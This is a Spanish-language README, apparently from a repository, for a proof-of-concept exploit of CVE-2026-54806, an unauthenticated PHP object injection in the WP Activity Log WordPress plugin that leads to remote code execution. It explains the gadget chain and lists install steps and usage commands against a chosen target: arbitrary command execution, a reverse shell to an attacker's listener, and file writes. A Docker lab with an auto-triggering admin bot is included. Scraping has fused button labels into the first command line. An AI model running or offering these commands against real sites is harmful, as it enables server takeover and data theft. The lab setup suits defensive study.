
Inyección de objetos PHP no autenticada a RCE en WP Activity Log <= 5.6.3.1 (CVE-2026-54806)
CVE-2026-54806 es una vulnerabilidad crítica (CVSS 9.8) de inyección de objetos PHP sin autenticar en el plugin WP Activity Log de WordPress (wp-security-audit-log) de Melapress. Un atacante no autenticado puede inyectar objetos PHP serializados a través del encabezado User-Agent en cualquier solicitud que desencadene un evento registrado (por ejemplo, un inicio de sesión fallido). La carga útil inyectada se almacena en la base de datos y se deserializa sin restricciones cuando un administrador visita el panel de WordPress, lo que conduce a una ejecución remota de código ciega (sin salida devuelta al atacante).
Plugin afectado: WP Activity Log <= 5.6.3.1 (corregido en 5.6.4)
Requerido para RCE: WordPress 6.4.0 - 6.4.1 — este PoC utiliza el gadget WP_HTML_Token, la única cadena del núcleo de WP con propiedades completamente públicas que sobrevive a sanitize_text_field() y se ajusta al límite de columna de 255 caracteres.
--check--command--shell--write-filegit clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-54806.git
cd CVE-2026-54806
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <ip> --lport <port>
python3 cve-2026-54806.py -t <target> --write-file <content> <path>
Laboratorio autónomo con WordPress 6.4.1 + WP Activity Log 5.6.3.1. Consulte DOCKER.md para más detalles.
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
El laboratorio incluye un admin-bot que visita el panel cada 60 segundos, por lo que las cargas útiles inyectadas se activan automáticamente — no se requiere interacción manual.
Esta herramienta se proporciona únicamente con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o daños causados por esta herramienta.